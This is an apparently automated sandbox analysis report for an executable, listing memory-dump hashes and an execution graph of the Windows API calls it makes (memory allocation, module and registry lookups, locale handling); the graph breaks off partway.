                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c2ad718499de5d9e4e8fa82325823f58de0827dc8e2cbe92a68ed5853ef6c9fe
                                                                                                                                  • Instruction ID: cb5c0ab930da38b4a25bde0a9f8086f68b3bf175a2233eb87a83fa57edc08ee7
                                                                                                                                  • Opcode Fuzzy Hash: c2ad718499de5d9e4e8fa82325823f58de0827dc8e2cbe92a68ed5853ef6c9fe
                                                                                                                                  • Instruction Fuzzy Hash: 3E71C433F206394BCB14CEA9C8415AEB7F2BB9825075A852AEC06FB395D674DC01CBD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b1da766f0d39d8db00ddf236debfe0509a228d001fbb7b23c8926ea3e5808031
                                                                                                                                  • Instruction ID: d3391fd78dcb8f0504b110cb1089e13636fe7ce545a8bc91667e52375a512602
                                                                                                                                  • Opcode Fuzzy Hash: b1da766f0d39d8db00ddf236debfe0509a228d001fbb7b23c8926ea3e5808031
                                                                                                                                  • Instruction Fuzzy Hash: 24517E73F205298BDB54CFADC8855DEB7F2BB98214B5A816AD819FB310D6789C018BD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c40f39e067cc5c62f27e4d64fdde3fc67aa041bc72a0ff228ccb5710f3542c6f
                                                                                                                                  • Instruction ID: e63ce037f09420a242c4c1a7858b20c58421d394c65a633b7aa6a841975feed7
                                                                                                                                  • Opcode Fuzzy Hash: c40f39e067cc5c62f27e4d64fdde3fc67aa041bc72a0ff228ccb5710f3542c6f
                                                                                                                                  • Instruction Fuzzy Hash: 66419676F101258F9B58DFAD9C8449EF7F2BF8C220719856AD819FB324D6758C058BD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 41fa60d096ad44fca672902bdbbbb1b222cb848d600f2db6d1a03d7683047682
                                                                                                                                  • Instruction ID: 48c3b83dd5753b60409358db6f5d603bb0aa0a63c3ab8403a6bf19c4de9d666e
                                                                                                                                  • Opcode Fuzzy Hash: 41fa60d096ad44fca672902bdbbbb1b222cb848d600f2db6d1a03d7683047682
                                                                                                                                  • Instruction Fuzzy Hash: 3D41ED7BF401394FCF14CEA8C9844AEBBB7BB88210716466ADC55FB361D6349D068BD4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cd5c885b763fbcba48c88ab59cbe5110e590eea4630d55639c009ff389ade76b
                                                                                                                                  • Instruction ID: 96ad5f4b80e2e012fa9626085fbc417695f6a6897efade41534eb518eb9328fc
                                                                                                                                  • Opcode Fuzzy Hash: cd5c885b763fbcba48c88ab59cbe5110e590eea4630d55639c009ff389ade76b
                                                                                                                                  • Instruction Fuzzy Hash: 1841E576F101298FDB64CFA8C9804AEF7F2FB88214719816ADD05FB355D6349D06CBA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 41881f7dd73d32b43840296207b8fec6c6df571094307620a66631681956e7ee
                                                                                                                                  • Instruction ID: 17d92306f92a04ceb79053f0789b2c58481ae62a27cfee2d1527cc5ef252a8c0
                                                                                                                                  • Opcode Fuzzy Hash: 41881f7dd73d32b43840296207b8fec6c6df571094307620a66631681956e7ee
                                                                                                                                  • Instruction Fuzzy Hash: E141D333F106394FCB14DE69884459EB7F6BBD825075A49AADC06FB3A1EA348D05CBD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b8c1487a2ef50d0d7588dd1dfa7235ffd97e89d55a2cd3c8c0f400b0e1d745bd
                                                                                                                                  • Instruction ID: e96d8e0ef1b4d7df7caa19f55bdd65ed4a1b70153a86e98dfc1685d2690a08cf
                                                                                                                                  • Opcode Fuzzy Hash: b8c1487a2ef50d0d7588dd1dfa7235ffd97e89d55a2cd3c8c0f400b0e1d745bd
                                                                                                                                  • Instruction Fuzzy Hash: 4241E333F106394FCB14DEAD884459EB7F6BB9825075A496ADC06FB390EA348D05CBD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 37d2f544a839742908bf3b3f822755091d2afb269e7d6a68efb493f521591516
                                                                                                                                  • Instruction ID: ccb3094c71390422578232930af77981bf320f8d44be53bad9638e04f4562577
                                                                                                                                  • Opcode Fuzzy Hash: 37d2f544a839742908bf3b3f822755091d2afb269e7d6a68efb493f521591516
                                                                                                                                  • Instruction Fuzzy Hash: C6415977F102294FC754DE98C9845AEB3E6BB9862076A456DDC05FB361EA70DC008BD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a2f98a204119ee5023521de9297522a084d20ae815fa648997da1892122a1dde
                                                                                                                                  • Instruction ID: b7af69574613210a86e5a6acad62be0eac0f63b14f2d26038fa3a718e7c72641
                                                                                                                                  • Opcode Fuzzy Hash: a2f98a204119ee5023521de9297522a084d20ae815fa648997da1892122a1dde
                                                                                                                                  • Instruction Fuzzy Hash: C831B336F0462A8F9B54DFADD8809AEB7F2BB893507058169E509EB351DA709C11CBC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 36c095f7991691ad1680a5335ed7cee86619d24878b90eb9ead5e9ebad48498f
                                                                                                                                  • Instruction ID: 527086b9f7f2668dbd16b7537fe6d77cc85055ed8bbeff76a9b8d85f814e915c
                                                                                                                                  • Opcode Fuzzy Hash: 36c095f7991691ad1680a5335ed7cee86619d24878b90eb9ead5e9ebad48498f
                                                                                                                                  • Instruction Fuzzy Hash: 1331F473F011394FD750CA6DD8805AABBE2ABD522070A81BADC49EF345E6749C06CBD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 59f69fcc4631121f40844e18dd08ddd017ea2b2a3dd13c57b625da427ee1be20
                                                                                                                                  • Instruction ID: b96d6bf6b9d880a7eaf5fd62c5d46f40cefe3da9f5eeb9dfbeddbb319319b0a5
                                                                                                                                  • Opcode Fuzzy Hash: 59f69fcc4631121f40844e18dd08ddd017ea2b2a3dd13c57b625da427ee1be20
                                                                                                                                  • Instruction Fuzzy Hash: AF21E173F001394BEB10DA6EC88059AB7E3ABD426070A816ADD4DEB345EA709D06CBD0

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:7.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:8.6%
                                                                                                                                  Total number of Nodes:2000
                                                                                                                                  Total number of Limit Nodes:42
                                                                                                                                  execution_graph 21364 406220 21365 406237 21364->21365 21366 406248 21364->21366 21381 406190 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 21365->21381 21367 406251 GetCurrentThreadId 21366->21367 21369 40625e 21366->21369 21367->21369 21377 405ec4 21369->21377 21371 406241 21371->21366 21372 4062a5 21373 4062d1 FreeLibrary 21372->21373 21375 4062d7 21372->21375 21373->21375 21374 406313 21375->21374 21376 406308 ExitProcess 21375->21376 21378 405f08 21377->21378 21379 405ed3 21377->21379 21378->21372 21379->21378 21382 414634 21379->21382 21381->21371 21383 41465c 21382->21383 21384 41463c 21382->21384 21383->21379 21385 41463f InterlockedCompareExchange 21384->21385 21385->21385 21386 41464d CloseHandle 21385->21386 21386->21383 21386->21385 21387 403220 21388 403230 21387->21388 21389 4032b8 21387->21389 21392 403274 21388->21392 21393 40323d 21388->21393 21390 4032c1 21389->21390 21391 402b58 21389->21391 21394 4032d9 21390->21394 21406 4033e8 21390->21406 21397 403533 21391->21397 21398 402b7a VirtualQuery 21391->21398 21399 402c5b 21391->21399 21395 402ca4 10 API calls 21392->21395 21396 403248 21393->21396 21400 402ca4 10 API calls 21393->21400 21402 4032fc 21394->21402 21407 4033c0 21394->21407 21430 4032e0 21394->21430 21418 40328b 21395->21418 21411 402c23 21398->21411 21412 402bb3 21398->21412 21405 402c59 21399->21405 21409 402ca4 10 API calls 21399->21409 21416 403255 21400->21416 21401 40344c 21403 402ca4 10 API calls 21401->21403 21423 403465 21401->21423 21415 40333c Sleep 21402->21415 21402->21430 21426 4034fc 21403->21426 21404 4032b1 21406->21401 21414 403424 Sleep 21406->21414 21406->21423 21413 402ca4 10 API calls 21407->21413 21428 402c72 21409->21428 21410 40326d 21439 402ca4 21411->21439 21412->21411 21421 402be0 VirtualAlloc 21412->21421 21422 402bde 21412->21422 21432 4033c9 21413->21432 21414->21401 21419 40343e Sleep 21414->21419 21420 403354 Sleep 21415->21420 21415->21430 21416->21410 21424 403028 10 API calls 21416->21424 21418->21404 21427 403028 10 API calls 21418->21427 21419->21406 21420->21402 21421->21411 21429 402bf6 VirtualAlloc 21421->21429 21422->21421 21424->21410 21425 4033e1 21426->21423 21433 403028 10 API calls 21426->21433 21427->21404 21428->21405 21434 403028 10 API calls 21428->21434 21429->21411 21431 402c0c 21429->21431 21431->21405 21432->21425 21436 403028 10 API calls 21432->21436 21437 403520 21433->21437 21434->21405 21435 402c2a 21435->21405 21463 403028 21435->21463 21436->21425 21440 402f04 21439->21440 21441 402cbc 21439->21441 21442 40301c 21440->21442 21443 402ec8 21440->21443 21449 402cce 21441->21449 21455 402d59 Sleep 21441->21455 21444 402a50 VirtualAlloc 21442->21444 21445 403025 21442->21445 21450 402ee2 Sleep 21443->21450 21452 402f22 21443->21452 21447 402a8b 21444->21447 21448 402a7b 21444->21448 21445->21435 21446 402cdd 21446->21435 21447->21435 21483 402a08 21448->21483 21449->21446 21456 402d9d Sleep 21449->21456 21458 402dbc 21449->21458 21450->21452 21454 402ef8 Sleep 21450->21454 21453 402f40 21452->21453 21457 402990 VirtualAlloc 21452->21457 21453->21435 21454->21443 21455->21449 21459 402d6f Sleep 21455->21459 21456->21458 21461 402db3 Sleep 21456->21461 21457->21453 21462 402dc8 21458->21462 21489 402990 21458->21489 21459->21441 21461->21449 21462->21435 21464 403120 21463->21464 21465 40303d 21463->21465 21466 402ab4 21464->21466 21467 403043 21464->21467 21465->21467 21470 4030ba Sleep 21465->21470 21468 40321a 21466->21468 21471 402a08 2 API calls 21466->21471 21469 40304c 21467->21469 21474 4030fe Sleep 21467->21474 21477 403135 21467->21477 21468->21405 21469->21405 21470->21467 21473 4030d4 Sleep 21470->21473 21472 402ac5 21471->21472 21475 402af5 21472->21475 21476 402adb VirtualFree 21472->21476 21473->21465 21474->21477 21478 403114 Sleep 21474->21478 21479 402aec 21475->21479 21480 402afe VirtualQuery VirtualFree 21475->21480 21476->21479 21481 4031b4 VirtualFree 21477->21481 21482 403158 21477->21482 21478->21467 21479->21405 21480->21475 21480->21479 21481->21405 21482->21405 21484 402a4e 21483->21484 21485 402a11 21483->21485 21484->21447 21485->21484 21486 402a1c Sleep 21485->21486 21487 402a31 21486->21487 21487->21484 21488 402a35 Sleep 21487->21488 21488->21485 21493 402924 21489->21493 21491 402998 VirtualAlloc 21492 4029af 21491->21492 21492->21462 21494 4028c4 21493->21494 21494->21491 21495 40f6c0 WriteFile 21496 40f6dd 21495->21496 21497 4046c0 21498 4046d0 WriteFile 21497->21498 21500 4046cc 21497->21500 21499 4046e8 GetLastError 21498->21499 21498->21500 21499->21500 21501 4083b0 21502 4083c0 GetModuleFileNameW 21501->21502 21504 4083dc 21501->21504 21505 40920c GetModuleFileNameW 21502->21505 21506 40925a 21505->21506 21511 40941c 21506->21511 21508 409286 21509 409298 LoadLibraryExW 21508->21509 21510 4092a0 21508->21510 21509->21510 21510->21504 21512 409455 21511->21512 21533 406bf0 21512->21533 21514 40947d 21515 40948f lstrcpynW lstrlenW 21514->21515 21516 4094b9 21515->21516 21518 40952a 21516->21518 21554 408f6c 21516->21554 21518->21508 21519 409515 21520 40951e 21519->21520 21521 40952f GetUserDefaultUILanguage 21519->21521 21522 409310 3 API calls 21520->21522 21578 408c28 EnterCriticalSection 21521->21578 21522->21518 21524 409540 21601 409310 21524->21601 21526 40954b 21527 409577 21526->21527 21528 40955b GetSystemDefaultUILanguage 21526->21528 21527->21518 21606 4093c0 GetUserDefaultUILanguage GetLocaleInfoW 21527->21606 21529 408c28 33 API calls 21528->21529 21531 40956c 21529->21531 21532 409310 3 API calls 21531->21532 21532->21527 21534 406bf4 21533->21534 21537 406c10 21533->21537 21534->21533 21536 406c00 21534->21536 21540 40716f 21534->21540 21541 4070b0 21534->21541 21535 406c40 21535->21514 21536->21537 21611 407504 21536->21611 21537->21535 21616 4041cc 14 API calls 21537->21616 21541->21540 21542 406bf0 15 API calls 21541->21542 21544 4070c3 21541->21544 21542->21544 21543 40710c 21543->21540 21547 407504 14 API calls 21543->21547 21546 4070ee 21544->21546 21617 406504 15 API calls 21544->21617 21546->21543 21618 406504 15 API calls 21546->21618 21550 407122 21547->21550 21549 40715a 21552 406bf0 15 API calls 21549->21552 21550->21549 21619 406368 14 API calls 21550->21619 21553 40716b 21552->21553 21553->21514 21555 408f83 21554->21555 21556 408f97 GetModuleFileNameW 21555->21556 21557 408fac 21555->21557 21558 408fc6 21556->21558 21559 408fb9 lstrcpynW 21557->21559 21560 408fd4 RegOpenKeyExW 21558->21560 21567 40913b 21558->21567 21559->21558 21561 409055 21560->21561 21562 408ff7 RegOpenKeyExW 21560->21562 21629 408d70 12 API calls 21561->21629 21562->21561 21563 409015 RegOpenKeyExW 21562->21563 21563->21561 21565 409033 RegOpenKeyExW 21563->21565 21565->21561 21565->21567 21566 409073 RegQueryValueExW 21568 409091 21566->21568 21569 4090c4 RegQueryValueExW 21566->21569 21567->21519 21572 4041b0 14 API calls 21568->21572 21570 4090e0 21569->21570 21571 4090c2 21569->21571 21573 4041b0 14 API calls 21570->21573 21575 40912a RegCloseKey 21571->21575 21630 4041cc 14 API calls 21571->21630 21574 409099 RegQueryValueExW 21572->21574 21576 4090e8 RegQueryValueExW 21573->21576 21574->21571 21575->21519 21576->21571 21579 408c74 LeaveCriticalSection 21578->21579 21580 408c54 21578->21580 21581 406bf0 15 API calls 21579->21581 21582 408c65 LeaveCriticalSection 21580->21582 21583 408c87 IsValidLocale 21581->21583 21592 408d17 21582->21592 21584 408ce5 EnterCriticalSection 21583->21584 21585 408c96 21583->21585 21671 406c7c 21584->21671 21587 408caa 21585->21587 21588 408c9f 21585->21588 21632 408908 18 API calls 21587->21632 21631 408b08 20 API calls 21588->21631 21592->21524 21593 408cb3 GetSystemDefaultUILanguage 21593->21584 21595 408cbd 21593->21595 21594 408ca8 21594->21584 21596 408cce GetSystemDefaultUILanguage 21595->21596 21633 406fe0 21595->21633 21670 408908 18 API calls 21596->21670 21599 408cdb 21600 406fe0 15 API calls 21599->21600 21600->21584 21602 409324 21601->21602 21603 409393 21602->21603 21604 409365 lstrcpynW 21602->21604 21603->21526 21700 4092d8 FindFirstFileW 21604->21700 21607 4092d8 2 API calls 21606->21607 21608 4093f3 21607->21608 21609 4092d8 2 API calls 21608->21609 21610 409410 21608->21610 21609->21610 21610->21518 21612 40753d 21611->21612 21613 407508 21611->21613 21612->21537 21613->21612 21620 4041b0 21613->21620 21615 407517 21615->21537 21616->21535 21617->21546 21618->21543 21619->21549 21622 4041b4 21620->21622 21621 4042c5 21628 404294 10 API calls 21621->21628 21622->21615 21622->21621 21623 4041be 21622->21623 21627 40a264 14 API calls 21622->21627 21623->21615 21626 4042e6 21626->21615 21627->21621 21628->21626 21629->21566 21630->21575 21631->21594 21632->21593 21634 406fe8 21633->21634 21644 407099 21633->21644 21635 406ff2 21634->21635 21647 406bf0 21634->21647 21637 407069 21635->21637 21638 406ffd 21635->21638 21636 406c10 21639 406c40 21636->21639 21673 4041cc 14 API calls 21636->21673 21645 407079 21637->21645 21693 406504 15 API calls 21637->21693 21649 407009 21638->21649 21674 406504 15 API calls 21638->21674 21639->21596 21640 406c00 21640->21636 21648 407504 14 API calls 21640->21648 21642 407029 21642->21644 21676 406f48 21642->21676 21644->21596 21645->21644 21646 406f48 15 API calls 21645->21646 21655 407045 21646->21655 21647->21636 21647->21640 21652 40716f 21647->21652 21653 4070b0 21647->21653 21648->21636 21649->21642 21675 406504 15 API calls 21649->21675 21653->21652 21657 406bf0 15 API calls 21653->21657 21660 4070c3 21653->21660 21656 407064 21655->21656 21689 406344 21655->21689 21656->21596 21657->21660 21658 40710c 21658->21652 21663 407504 14 API calls 21658->21663 21662 4070ee 21660->21662 21694 406504 15 API calls 21660->21694 21662->21658 21695 406504 15 API calls 21662->21695 21665 407122 21663->21665 21666 40715a 21665->21666 21696 406368 14 API calls 21665->21696 21668 406bf0 15 API calls 21666->21668 21669 40716b 21668->21669 21669->21596 21670->21599 21672 406c80 lstrcpynW LeaveCriticalSection 21671->21672 21672->21592 21673->21639 21674->21649 21675->21642 21677 406fb8 21676->21677 21678 406f55 21676->21678 21679 406344 14 API calls 21677->21679 21682 406f6d 21678->21682 21683 406fac 21678->21683 21697 406d1c 15 API calls 21678->21697 21688 406fa9 21679->21688 21680 407504 14 API calls 21680->21677 21682->21683 21684 406f86 21682->21684 21683->21680 21698 4041e4 14 API calls 21684->21698 21686 406f8e 21687 406344 14 API calls 21686->21687 21686->21688 21687->21688 21688->21655 21690 40634a 21689->21690 21692 406365 21689->21692 21690->21692 21699 4041cc 14 API calls 21690->21699 21692->21656 21693->21645 21694->21662 21695->21658 21696->21666 21697->21682 21698->21686 21699->21692 21701 409301 FindClose 21700->21701 21702 409307 21700->21702 21701->21702 21702->21602 21703 409d02 GetSystemInfo 21704 4069d4 21705 4068c4 21704->21705 21706 4069dc SysAllocStringLen 21704->21706 21709 4068d8 21705->21709 21710 4068ca SysFreeString 21705->21710 21707 406894 21706->21707 21708 4069ec SysFreeString 21706->21708 21711 4068b0 21707->21711 21712 4068a0 SysAllocStringLen 21707->21712 21710->21709 21712->21707 21712->21711 21713 40a178 21714 40a191 21713->21714 21715 40a1d2 21713->21715 21731 40493c 14 API calls 21714->21731 21717 40a19b 21732 40493c 14 API calls 21717->21732 21719 40a1a5 21733 40493c 14 API calls 21719->21733 21721 40a1af 21734 40874c DeleteCriticalSection 21721->21734 21723 40a1b4 21735 404144 21723->21735 21727 40a1be 21728 406344 14 API calls 21727->21728 21729 40a1c8 21728->21729 21730 406344 14 API calls 21729->21730 21730->21715 21731->21717 21732->21719 21733->21721 21734->21723 21736 40414d CloseHandle 21735->21736 21737 40415f 21735->21737 21736->21737 21738 40416d 21737->21738 21751 403b64 VirtualQuery Sleep Sleep VirtualAlloc MessageBoxA 21737->21751 21740 404176 VirtualFree 21738->21740 21741 40418f 21738->21741 21740->21741 21745 4040b4 21741->21745 21744 40a15f 6 API calls 21744->21727 21746 4040d9 21745->21746 21747 4040c7 VirtualFree 21746->21747 21748 4040dd 21746->21748 21747->21746 21749 404124 VirtualFree 21748->21749 21750 40413a 21748->21750 21749->21748 21750->21744 21751->21738 21752 44373c 21753 443744 21752->21753 21753->21753 22183 40a2b0 GetModuleHandleW 21753->22183 21761 44378b 21762 407450 15 API calls 21761->21762 21763 443797 21762->21763 21764 404cdc 14 API calls 21763->21764 21765 44379c 21764->21765 21766 4042f8 14 API calls 21765->21766 21767 4437a1 21766->21767 21768 407450 15 API calls 21767->21768 21769 4437ad 21768->21769 21770 404cdc 14 API calls 21769->21770 21771 4437b2 21770->21771 21772 4042f8 14 API calls 21771->21772 21773 4437b7 21772->21773 21774 407450 15 API calls 21773->21774 21775 4437c0 21774->21775 21776 404cdc 14 API calls 21775->21776 21777 4437c5 21776->21777 21778 4042f8 14 API calls 21777->21778 21779 4437ca 21778->21779 22209 404504 GetCommandLineW 21779->22209 21781 4437cf 21782 443876 21781->21782 22214 404564 21781->22214 21784 407450 15 API calls 21782->21784 21786 443882 21784->21786 21788 404cdc 14 API calls 21786->21788 21789 443887 21788->21789 21791 4042f8 14 API calls 21789->21791 21790 4437f0 21792 44396a 21790->21792 21795 404564 17 API calls 21790->21795 21794 44388c 21791->21794 21793 404564 17 API calls 21792->21793 21796 443977 21793->21796 21797 407450 15 API calls 21794->21797 21798 443803 21795->21798 21799 4072a4 15 API calls 21796->21799 21800 443898 21797->21800 21801 4072a4 15 API calls 21798->21801 21802 443984 21799->21802 21803 404cdc 14 API calls 21800->21803 21804 443810 21801->21804 21805 443986 21802->21805 21806 4439ac 21802->21806 21807 44389d 21803->21807 21804->21792 21810 404564 17 API calls 21804->21810 22938 43cea4 21805->22938 21814 4439bc 21806->21814 21815 4439ed 21806->21815 21809 4042f8 14 API calls 21807->21809 21812 4438a2 21809->21812 21813 443823 21810->21813 21811 443993 21817 407450 15 API calls 21811->21817 21818 407450 15 API calls 21812->21818 21816 4072a4 15 API calls 21813->21816 21819 407450 15 API calls 21814->21819 22233 43a644 GetNativeSystemInfo 21815->22233 21820 443830 21816->21820 21821 44399d 21817->21821 21822 4438ab 21818->21822 21824 4439c8 21819->21824 21820->21792 21831 404564 17 API calls 21820->21831 21825 404cdc 14 API calls 21821->21825 21826 404cdc 14 API calls 21822->21826 21830 404cdc 14 API calls 21824->21830 21832 4439a2 21825->21832 21833 4438b0 21826->21833 21828 4439f6 21834 407450 15 API calls 21828->21834 21829 443a11 22235 43a7bc 21829->22235 21835 4439cd 21830->21835 21836 443843 21831->21836 21838 4042f8 14 API calls 21832->21838 21839 4042f8 14 API calls 21833->21839 21840 443a02 21834->21840 21841 4042f8 14 API calls 21835->21841 21842 4072a4 15 API calls 21836->21842 21849 443965 21838->21849 21844 4438b5 21839->21844 21845 404cdc 14 API calls 21840->21845 21846 4439d2 21841->21846 21847 443850 21842->21847 21843 443a16 21848 404564 17 API calls 21843->21848 21850 407450 15 API calls 21844->21850 21852 443a07 21845->21852 21853 407450 15 API calls 21846->21853 21847->21792 21858 404564 17 API calls 21847->21858 21854 443a23 21848->21854 21851 4438c1 21850->21851 21855 404cdc 14 API calls 21851->21855 21856 4042f8 14 API calls 21852->21856 21857 4439de 21853->21857 21859 4072a4 15 API calls 21854->21859 21860 4438c6 21855->21860 21856->21849 21861 404cdc 14 API calls 21857->21861 21862 443863 21858->21862 21863 443a30 21859->21863 21864 4042f8 14 API calls 21860->21864 21865 4439e3 21861->21865 21866 4072a4 15 API calls 21862->21866 21867 443cc4 21863->21867 21872 443a5f 21863->21872 21873 407450 15 API calls 21863->21873 21868 4438cb 21864->21868 21870 4042f8 14 API calls 21865->21870 21871 443870 21866->21871 21869 404564 17 API calls 21867->21869 21874 407450 15 API calls 21868->21874 21875 443cd1 21869->21875 21870->21849 21871->21782 21871->21792 21876 407450 15 API calls 21872->21876 21877 443a4b 21873->21877 21878 4438d7 21874->21878 21879 4072a4 15 API calls 21875->21879 21880 443a6b 21876->21880 21881 404cdc 14 API calls 21877->21881 21882 404cdc 14 API calls 21878->21882 21883 443cde 21879->21883 21884 404cdc 14 API calls 21880->21884 21885 443a50 21881->21885 21886 4438dc 21882->21886 21887 443e6b 21883->21887 21892 443d0d 21883->21892 21898 407450 15 API calls 21883->21898 21888 443a70 21884->21888 21890 4042f8 14 API calls 21885->21890 21891 4042f8 14 API calls 21886->21891 21889 404564 17 API calls 21887->21889 21893 4042f8 14 API calls 21888->21893 21894 443e78 21889->21894 21896 443a55 21890->21896 21897 4438e1 21891->21897 21895 407450 15 API calls 21892->21895 21899 443a75 21893->21899 21900 4072a4 15 API calls 21894->21900 21901 443d19 21895->21901 22942 40632c 10 API calls 21896->22942 21903 407450 15 API calls 21897->21903 21904 443cf9 21898->21904 21905 407450 15 API calls 21899->21905 21906 443e85 21900->21906 21907 404cdc 14 API calls 21901->21907 21908 4438ed 21903->21908 21909 404cdc 14 API calls 21904->21909 21910 443a81 21905->21910 21912 443ecb 21906->21912 21918 443eb0 21906->21918 21919 443e90 21906->21919 21913 443d1e 21907->21913 21914 404cdc 14 API calls 21908->21914 21915 443cfe 21909->21915 21911 404cdc 14 API calls 21910->21911 21917 443a86 21911->21917 21921 404564 17 API calls 21912->21921 21920 4042f8 14 API calls 21913->21920 21922 4438f2 21914->21922 21916 4042f8 14 API calls 21915->21916 21923 443d03 21916->21923 21925 4042f8 14 API calls 21917->21925 21924 407450 15 API calls 21918->21924 21926 407450 15 API calls 21919->21926 21927 443d23 21920->21927 21928 443ed8 21921->21928 21929 4042f8 14 API calls 21922->21929 22944 40632c 10 API calls 21923->22944 21932 443ebc 21924->21932 21933 443a8b 21925->21933 21934 443e9c 21926->21934 21935 443d31 21927->21935 21936 443d2c 21927->21936 21937 4072a4 15 API calls 21928->21937 21930 4438f7 21929->21930 21938 407450 15 API calls 21930->21938 21939 404cdc 14 API calls 21932->21939 21940 407450 15 API calls 21933->21940 21941 404cdc 14 API calls 21934->21941 21944 43b7d4 52 API calls 21935->21944 21942 43a688 18 API calls 21936->21942 21943 443ee5 21937->21943 21945 443903 21938->21945 21946 443ec1 21939->21946 21947 443a97 21940->21947 21948 443ea1 21941->21948 21942->21935 21943->21849 21949 443eeb 21943->21949 21950 443d36 21944->21950 21951 404cdc 14 API calls 21945->21951 21952 4042f8 14 API calls 21946->21952 21953 404cdc 14 API calls 21947->21953 21954 4042f8 14 API calls 21948->21954 21955 407450 15 API calls 21949->21955 21956 407450 15 API calls 21950->21956 21958 443908 21951->21958 21959 443ec6 21952->21959 21960 443a9c 21953->21960 21961 443ea6 21954->21961 21962 443ef7 21955->21962 21957 443d42 21956->21957 21964 404cdc 14 API calls 21957->21964 21965 4042f8 14 API calls 21958->21965 22949 43f7a4 129 API calls 21959->22949 21967 4042f8 14 API calls 21960->21967 22948 40632c 10 API calls 21961->22948 21963 404cdc 14 API calls 21962->21963 21969 443efc 21963->21969 21970 443d47 21964->21970 21971 44390d 21965->21971 21972 443aa1 21967->21972 21973 4042f8 14 API calls 21969->21973 21974 4042f8 14 API calls 21970->21974 21975 407450 15 API calls 21971->21975 21976 407450 15 API calls 21972->21976 21977 443f01 21973->21977 21978 443d4c 21974->21978 21979 443919 21975->21979 